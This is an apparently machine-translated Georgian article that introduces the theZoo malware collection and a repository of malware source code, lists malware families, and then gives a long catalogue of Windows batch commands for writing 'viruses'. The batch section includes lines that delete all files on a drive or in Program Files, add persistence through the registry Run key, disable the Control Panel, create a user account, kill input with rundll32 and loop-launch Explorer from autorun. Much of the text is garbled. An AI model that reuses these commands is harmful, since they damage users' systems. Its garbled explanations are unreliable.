თქვენ შეგიძლიათ გამოიყენოთ theZoo პროექტი სხვადასხვა გზით: პირდაპირ საიტიდან ან დამატებითი ჩარჩოს მეშვეობით. ჩვენ დანაშაულს ორი კუთხით შევხედავთ. ჯერ დავასრულოთ.

ახლა მოდით გადავიდეთ საიტზე და ვნახოთ მრავალი დირექტორია და ფაილი.

შეიცავს ვირუსის ფაილებსნაპოვნი კატალოზში:

ზოოპარკი/მავნე პროგრამები/ორობითი ფაილები/

გადმოწერილი ვირუსის ფაილს აქ ნახავთ. თითოეული ფაილისთვის შექმენით დირექტორია, რომელიც შეიცავს 4 ფაილს: ყველაზე სახიფათო პროგრამული უზრუნველყოფა დაშიფრული სახით ZIP არქივში, SHA256 და MD5 - საარქივო შემოწმება ავთენტიფიკაციისთვის და პაროლი დაშიფრული არქივისთვის.


გადმოწერილი ვირუსის ფაილები: Androrat Trojan

ვირუსის კოდინაპოვნი კატალოზში:

theZoo/malwares/Source/Original/

კანქვეშა კატალიზს აქვს რამდენიმე მსგავსება ფაილთან. ყველაფერი იგივეა, რაც კომპილირებული ფაილებით.


ვირუსის ტექსტები: Dendroid Trojan

კანის მიმდებარე ზონისთვის არის გაუმჯობესება, მაგრამ გაუმჯობესების დაჩქარების მიზნით აუცილებელია ჩარჩოს დაყენება.

Zoo Framework-ის დასაყენებლად გამოიყენეთ შემდეგი ბრძანება:

git კლონი https://github.com/ytisf/theZoo

ვიმოგი: urllib2, python3

ბრძანებები: ძებნა, გამოყენება, მიღება, ინფორმაცია, სია ყველა, report-mal, განახლება-db, გასვლა. დამატებითი დეტალები დახმარების ბრძანების მიღმა არსებული ბრძანებების შესახებ.

კარგი, ჩვენ დავასრულეთ ეს პროექტი, ახლა მოდით გადავხედოთ მეორეს.

Virus Sights: Malware Project

Malware პროექტი ახლა მუშაობს და მუშაობს Githab-ზე. ვირუსების შერჩევა არც ისე დიდია, როგორც ზოოპარკში, მაგრამ უფრო ხშირად განახლდება. მავნე პროგრამების მცირე რაოდენობას შორის შეგიძლიათ იპოვოთ ტროასების, ბოტნეტების, ჰაკერების, პაროლის მოპარვისა და სხვა სიკეთეების გამომავალი კოდები.

ღერძის სია დღეისთვის:

  • ალინა სპარკი (ტროიანი)
  • Bleeding Life 2 (Expol პაკეტი)
  • კარბერპი (ბოტნეტი)
  • კარბერპი (საბანკო ტროას)
  • Crimepack 3.1.3 (Exploit pack)
  • დენდროიდი (ტროას ანდროიდისთვის)
  • Dexter v2 (ტროას)
  • Eda2, Stolich, Win32.Stolich (Zdirnik)
  • FlexiSpy (Shpigunske პროგრამული უზრუნველყოფა)
  • (ჩარჩო)
  • GMBot (Android Trojan)
  • Gozi-ISFB - (საბანკო ტროას)
  • Grum (სპამის ბოტი)
  • ჰაკერების გუნდი RCS ()
  • დამალული ცრემლი (ზდირნიკი)
  • KINS (საბანკო ტროას)
  • მირაი (გამოსვლების ინტერნეტის ბოტნეტი)
  • Pony 2.0 (პაროლის მოპარვა)
  • PowerLoader (ბოტნეტი)
  • RIG Front-end (Exploit pack)
  • როვნიქსი (ბუტკო)
  • თინბა (საბანკო ტროას)
  • TinyNuke (საბანკო ტროას)
  • ტროხილი, წითელი ფოთლები (RAT)
  • ზევსი (საბანკო ტროასი)

ვირუსის კოდი: მავნე პროგრამა

მაგალითად, გადავიდეთ Alina Trojan საქაღალდეში. აქ ჩვენ გავეცნობით არაერთ დირექტორიას, მათ შორის ბოლო. გარდა ამისა, ქვედა ნაწილში ავტორებმა გაუგზავნეს შეტყობინება არასამართლიანი ინფორმაციისთვის.

ბრძანების ღერძი
assoc .exe = .mp3- Executives გამოშვებულია მუსიკალური ლეიბლის მსგავსად E: pridurok-change gwent to idiot time 00:00 -change საათი
date 03.13.36-change date assoc .lnk = .txt-შეცვალეთ ეტიკეტები txt ფაილში ასლი% 0 F: \ Work.bat-ობიექტის კოპირება

1) პროგრამა ფლეშ დრაივიდან ფაილების წასაშლელად (როგორც არის ჩასმული) და სახელის გადარქმევა.
delF:\*. */ქ
ეტიკეტი F: HACK
2) პროგრამა კომპიუტერზე თარიღისა და საათის შესაცვლელად და C დისკზე და ფლეშ დრაივზე კოპირებისთვის.
დრო 14:13
თარიღი 11.07.12
copy%0 C:\Time.bat
copy%0 F:\Time.bat
----------
> Nul-hook row ბრძანება
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton - ცვლის მაუსის კლავიშებს
---------------
დააკოპირეთ ""%0"" "%SystemRoot%\system32\File.bat"
reg დაამატეთ "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "File" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg დაამატეთ HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
უძლიერესი გუნდი: პროგრამის დამატება Automobile OS-ში.
"Del x:\y*. * / Q" - იხილეთ ყველა ფაილი დისკზე x საქაღალდეში y (საქაღალდეების ჩათვლით) (del F: \ Data *. * / Q);
„ქსელი მომხმარებელი „x“ / დამატება“ - დაამატეთ მოსწავლის კომპიუტერს სახელით x (კონდახით net მომხმარებელი „შებოლილი“ / დამატება);
„@Echo off“ შედის ჩვენი ვირუსის ყურში და იღებს ყველაფერს
rundll32 მომხმარებელი, disableoemlayer - სისტემის ავარია (!) - გამორთე ყველა შეყვანის და გამომავალი ფუნქციები (კლავიატურა, დისპლეი, მაუსი). შედეგად, გამოჩნდება შავი ეკრანი კურსორით და სისტემა არაფერზე რეაგირებს, მაგრამ Windows გააგრძელებს ფუნქციონირებას.
del *. * / q (ამ ბრძანების გაშვების შემდეგ, ყველა ფაილი, გარდა საქაღალდეებისა, რომლებიც იმყოფებოდა ამ საქაღალდეში, სადაც ვირუსი გაუშვა, წაიშლება!!!
md 1 ფოლდერის საქაღალდე
Windows-ის მიერ გადმოტვირთვისას ფაილის გასაშვებად, დაარქვით მას Autoexec.bat
Echo Virus ჩატვირთვა-ჩაწერა ეკრანზე ვირუსი Lodin
del c: პროგრამის ფაილები / q (ათვალიერებს ყველა ფაილს ამ საქაღალდედან)
reg - რობოტის შუა რეესტრით. Divitisya reg /? ყველას!
rcp - ფაილების გაცვლა rcp-ის საშუალებით ascii-ში
რუნასი - კორისტუვაჩის სახელზე
დავალების სია - აჩვენებს მასთან დაკავშირებულ პროგრამებსა და სესიებს.
taskkill - გაძლევთ საშუალებას შეწყვიტოთ ერთი ან მეტი პროცესი
tftp - ტრივიალური ftp
tskill - პროცესის მოკვლა
reg - პროგრამა რეესტრთან ურთიერთობისთვის
bootcfg - boot.ini პარამეტრები
დამატება - საშუალებას გაძლევთ გახსნათ დისტანციური ფაილები ნაკადში ყოფნის გარეშე.
getmac - ოტრიმატი მას
logoff - დავალებების დასრულება კლიენტის სესიისთვის.
mem - ინფორმაციის ეკრანის სურათი RAM-ში მიმდინარე პროცესების შესახებ
mqbkup - არქივი
ნეტშ - ??
openfiles - ღია ფაილების ნახვა.
rsh - ბრძანებების ვიკი დისტანციურ კვანძებზე, რომლებიც მუშაობენ rsh
sc - ბრძანების ხაზი ??
rexec - ბრძანებების ვიკი დისტანციურ კვანძებზე, რომლებიც მუშაობენ rexec
გამორთვა - ვიქნუტი (ჰეჰე) ლოკალური ან დისტანციური კომპიუტერი.
systeminfo - ინფორმაციის შეჯამება კომპიუტერების შესახებ.
schtasks - დავალების დამგეგმავი.
xcopy - ფაილების და დირექტორიების კოპირება.
tsshutdn - სერვერის რობოტის გამორთვა დადგენილი წესით.
ნაკრები - ახალი, ახალი და წაშლილი ცვლილებები cmd.exe-ში. სისტემის სიმძლავრე (გამოითქმის "ჩემი კომპიუტერი") - დამატებით - Zminni seredovishcha. იქ ყველაფერი კარგად არ არის, მაგრამ ბევრია! ყველა უბრალოდ გაოცებულია.
საუბრის წინ, RunDLL ბრძანებების ღერძი, რომელიც შეიძლება გამოყენებულ იქნას სურათების ფაილების შექმნისას

rundll32 მომხმარებელი, wnetdisconnectdialog
ფანჯარა "პირის დისკის დაკავშირება" ვიკლიკატი

rundll32 მომხმარებელი, disableoemlayer
არ მოახდინო პროვოცირება

rundll32 მომხმარებელი, repaintscreen
ონოვიტი (იაკი)

rundll32 მომხმარებელი, setcursorpos
მოათავსეთ Maus-კურსორი ზემოთ

rundll32 დისკის ასლი, DiskCopyRunDll
დააჭირეთ ღილაკს "დისკის კოპირება".

rundll32 rnaui.dll, RnaWizard / 1
დიალოგი "Setup Link" დააწკაპუნეთ (/ 1 = ფანჯარა არ არის)

rundll32 shell, shelleexecute
Explorer-გახსენით root დირექტორიაში

rundll32 shell32, OpenAs_RunDLL
Vikno "დააწკაპუნეთ დახმარებისთვის ..." დააჭირეთ ***

rundll32 shell32, SHFormatDrive
ფანჯარაში "ფორმატი: Disk3.5 (A)" დააწკაპუნეთ

rundll32 shell32, ShellAboutA
Info-Box (Windows-ის შესახებ) Wiklikati

rundll32 shell32, SHExitWindowsEx 0
Windows 98-ის გადატვირთვა (autoexec.bat და ა.შ. გარეშე)

rundll32 shell32, SHExitWindowsEx 1
დაასრულეთ Windows 98-თან მუშაობა

rundll32 shell32, SHExitWindowsEx 2
Windows-98-PC ჩატვირთვა

rundll32 shell32, SHExitWindowsEx -1
Windows-98-Explorer ხელახლა დაიწყება

rundll32 shell32, Control_RunDLL
გახსენით "პანელის" ფანჯარა

rundll32 shell32, Control_RunDLL desk.cpl
გახსენით "ეკრანის სიმძლავრე"

rundll32 shell32, Control_RunDLL main.cpl
გახსენით Modul-Control Panel MAIN.CPL–დან **

rundll32 krnl386.exe, exitkernel
გადით Windows ყოველგვარი შეტყობინებების/კითხვის გარეშე

rundll32 მომხმარებელი, swapmousebuton
მაუსის ღილაკების "გადაწყობა" *

rundll32 კლავიატურა, გამორთეთ
კლავიატურის "ჩართვა" *

rundll32 მაუსი, გამორთე
"ჩართე" მიშა *

rundll rnaui.dll, RnaDial "პროვაიდერი"
დააჭირეთ "დაკავშირების" ფანჯარას "პროვაიდერის" სახელიდან

rundll32 მომხმარებელი, tilechildwindows
დაალაგეთ ყველა ჩამონგრეული ფანჯარა ზემოდან ქვემოდან

rundll32 მომხმარებელი, cascadechildwindows
ავაშენოთ ყველა არა ჩამონგრეული ფანჯარა კასკადში

rundll32 sysdm.cpl, InstallDevice_Rundll
(Unities. Possibility in W98) დააინსტალირეთ non-Plug & Play აღჭურვილობა

rundll32 msprint2.dll, RUNDLL_PrintTestPage
VIBIR პრინტერის მენიუში და გაგზავნეთ ახალი ტესტი

rundll32 მომხმარებელი, setcaretblinktime
დააყენეთ ახალი კურსორის ფლეშ სიხშირე *

rundll32 მომხმარებელი, setdoubleclicktime
დააყენეთ ახალი წნევის სიჩქარე *

rundll32 setupx.dll, InstallHinfSection
DefaultInstall 130; C:\file.inf
ფანჯარა "გადატვირთეთ სისტემა. შეასრულეთ ეს ინფექცია? დიახ/არა"****

ASSOC - აჩვენებს ან ცვლის ფაილების ბმულის გაფართოებას
AT - Chi გეგმავს ბრძანებებს და პროგრამებს ვიკისთვის თქვენს კომპიუტერში.
ATTRIB - აჩვენებს ან ცვლის ფაილის ატრიბუტებს.
BREAK - აინსტალირებს ან აძლიერებს კომბინაციის ხელახლა შემოწმებას.
CACLS - აჩვენებს ან ცვლის ფაილებისთვის წვდომის კონტროლის სიებს (ACL).
CALL - იძახებს ერთ *.BAT ფაილს მეორისგან.
CD - აჩვენებს ან ცვლის ნაკადის დირექტორიას სახელს.
CHCP - აჩვენებს ან ადგენს აქტიური კოდის გვერდის ნომერს.
CHDIR - აჩვენებს სახელებს ან ცვლის ნაკადის დირექტორიას სახელებს.
CHKDSK - ამოწმებს დისკს და აჩვენებს ინფორმაციას ინსტალაციის შესახებ.
CLS - ასუფთავებს ეკრანს.
CMD - იწყება Windows NT ბრძანების თარჯიმანის ახალი მაგალითი.
COLOR - ადგენს კონსოლის წინა პლანზე და ფონის სტანდარტულ ფერს.
COMMAND - იწყებს Windows ბრძანების თარჯიმნის ახალ ასლს.
COMP - უდრის ორ ფაილს ან ფაილის პარამეტრს.
COMPACT - აჩვენებს ან ცვლის ფაილების შეკუმშვას Windows NT (NTFS) დისკებზე.
CONVERT - გარდაქმნის FAT ტომებს Windows NT ფაილური სისტემის (NTFS) ფორმატში. ნაკადის დისკის კონვერტაცია შეუძლებელია.
COPY - აკოპირებს ერთ ან მეტ ფაილს სხვა ადგილას.
CTTY - ცვლის ტერმინალურ მოწყობილობას, რომელიც გამოიყენება თქვენი სისტემის სამართავად.
თარიღი - აჩვენებს ან ადგენს თარიღს.
DEL - ნახულობს ერთ ან მეტ ფაილს.
DEBUG - აკონფიგურირებს პროგრამების შემუშავებას, ტესტირებას და ინსტრუმენტული ფუნქციების რედაქტირებას.
DIR - აჩვენებს დირექტორიაში არსებული ფაილების და ქვეცნობარების ჩამონათვალს.
DISKCOMP - უდრის ორ ფლოპი დისკს.
DISKCOPY - აკოპირებს ერთი ფლოპი დისკის ნაცვლად მეორეზე.
DOSKEY - არედაქტირებს ბრძანების ხაზებს, აახლებს Windows ბრძანებებს და ქმნის მაკროებს.
ECHO - აჩვენებს შეტყობინებებს ან რთავს/გამორთავს ახალ ბრძანებებს.
EMM386 - რთავს/გამორთავს EMM386 გაფართოებული მეხსიერების მხარდაჭერას.
ENDLOCAL - წყვეტს ცვლილებების ლოკალიზაციას დამატებით შუა პროგრამაში * .BAT ფაილში.
ERASE - შლის ერთ ან მეტ ფაილს.
EXIT - უშვებს პროგრამას (ბრძანების თარჯიმანი).
EXTRACT - ინფორმაციის მოძიება CAB ფაილებიდან.
FC - ადარებს ორ ფაილს ან ფაილის პარამეტრს და აჩვენებს მათ შორის არსებულ რეესტრს.
FIND - ეძებს ტექსტურ სტრიქონს ფაილში ან ფაილებში.
FINDSTR - მოძებნეთ რიგები ფაილებში.
FOR - აკონფიგურირებს ბრძანებას, რომელიც მინიჭებულია ფაილების ნაკრების თითოეულ ფაილზე.
FORMAT - აფორმებს დისკს Windows-ისთვის.
FTYPE - აჩვენებს ან ცვლის ფაილის ტიპებს, რომლებიც ჩამოთვლილია გაფართოების ბმულებში.
GOTO - მიმართავს Windows NT ბრძანების თარჯიმანს *.BAT ფაილში მონიშნულ მწკრივზე.
GRAFTABL - Windows გაძლევთ საშუალებას აჩვენოთ ფსევდოგრაფიული სიმბოლოები, რომლებიც ჩასმულია გრაფიკულ რეჟიმში.
HELP - უზრუნველყოფს დახმარების ინფორმაციას Windows ბრძანებებისთვის.
IF - გარდაქმნის რეცხვის პროცესს * .BAT ფაილად.
KEYB - აკონფიგურირებს კლავიატურას მოცემული ფილმისთვის.
LABEL - ქმნის, ცვლის ან წაშლის ტომის ლეიბლს დისკზე.
LOADHIGH (LH) - იტვირთება პროგრამა მეხსიერების ზედა მისამართებში.
MD - ქმნის დირექტორიას.
MEM - აჩვენებს თქვენს სისტემაში გამოყენებული და თავისუფალი მეხსიერების რაოდენობას.
MKDIR - ქმნის დირექტორიას.
MODE - აკონფიგურირებს სისტემის მოწყობილობებს.
მეტი - აჩვენებს ხატულას თითო ეკრანზე.
MOVE - გადააქვს ერთი ან მეტი ფაილი ერთი დირექტორიადან მეორეში იმავე დისკზე.
NETSTAT - აჩვენებს პროტოკოლების სტატისტიკას და ნაკადის TCP/IP კავშირებს.
NLSFUNC - იჭერს კონკრეტულ ინფორმაციას რეგიონისთვის.
PATH - აჩვენებს ან აყენებს ძიების ბილიკებს კომპილირებული ფაილებისთვის.
PAUSE - ამუშავებს *.BAT ფაილს და აჩვენებს შეტყობინებებს.
POPD - განაახლებს PUSHD-ის მიერ შენახული ნაკადის დირექტორიას გადაგზავნის მნიშვნელობას.
PRINT - კიდევ ერთი ტექსტური ფაილი.
PROMPT - ცვლის Windows ბრძანებების მოთხოვნას.
PUSHD - ინახავს მიმდინარე დირექტორიას, შემდეგ ცვლის მას.
RD - ნახულობს დირექტორიას.
RECOVER - განაახლებს წაკითხულ ინფორმაციას ცუდი ან დეფექტური დისკიდან.
REM - წერს კომენტარებს (შენიშვნებს) * .BAT ფაილებზე ან CONFIG.SYS-ზე.
REN - გადარქმევა ფაილის ან ფაილის სახელი.
RENAME - გადარქმევა ფაილის ან ფაილის სახელი.
REPLACE - ცვლის ფაილებს.
RESTORE - განაახლებს ფაილებს, რომლებიც დაარქივდა BACKUP ბრძანების გამოყენებით.
RMDIR - ნახულობს დირექტორიას.
SET - აჩვენებს, დააინსტალირებს ან შლის Windows მედია ცვლილებებს.
SETLOCAL - იწყებს შუა ნაკადის ცვლილებების ლოკალიზაციას * .BAT ფაილში.
SETVER - ადგენს MS-DOS ვერსიის ნომერს, რომელსაც Windows აცნობებს პროგრამებს.
SHIFT - პოზიციის განადგურება ჩანაცვლებულია პარამეტრებით * .BAT ფაილებში.
SMARTDRV - დააინსტალირეთ და დააკონფიგურირეთ SMART Drive დისკის ქეშირების პროგრამა.
SORT - ახარისხებს შეყვანის ნაკადს.
დაწყება - იწყება ფანჯარა მითითებული პროგრამის ან ბრძანებისთვის.
SUBST - აკავშირებს გზას დისკის ასოსთან.
SYS - აკოპირებს MS-DOS სისტემის ფაილებს და ბრძანების თარჯიმანს თქვენს მიერ მითითებულ დისკზე.
TIME - აჩვენებს ან აყენებს სისტემის საათს.
TITLE - ადგენს ფანჯრის სათაურს სესიისთვის.
TREE - გრაფიკულად აჩვენებს დირექტორია სტრუქტურას დისკში ან მარშრუტში.
TYPE - აჩვენებს ტექსტური ფაილის ნაცვლად.
VER - აჩვენებს ვინდოუსის ვერსიას.
VERIFY - ავალებს Windows-ს, შეამოწმოს, რომ ფაილები დისკზე სწორად იწერება.
VOL - აჩვენებს დისკის მოცულობის ეტიკეტს და სერიულ ნომერს.
XCOPY - აკოპირებს ფაილებს და დირექტორიაში ხეებს.

კარგად, თუ გსურთ Windows-ის „მართვა“, მაშინ:
@echo გამორთულია
მკვლევარის დაწყება
მკვლევარის დაწყება
მკვლევარის დაწყება
დაწყება explorer - გაიმეორეთ 100 ჯერ და დარეგისტრირდით ავტომატურ პასუხში.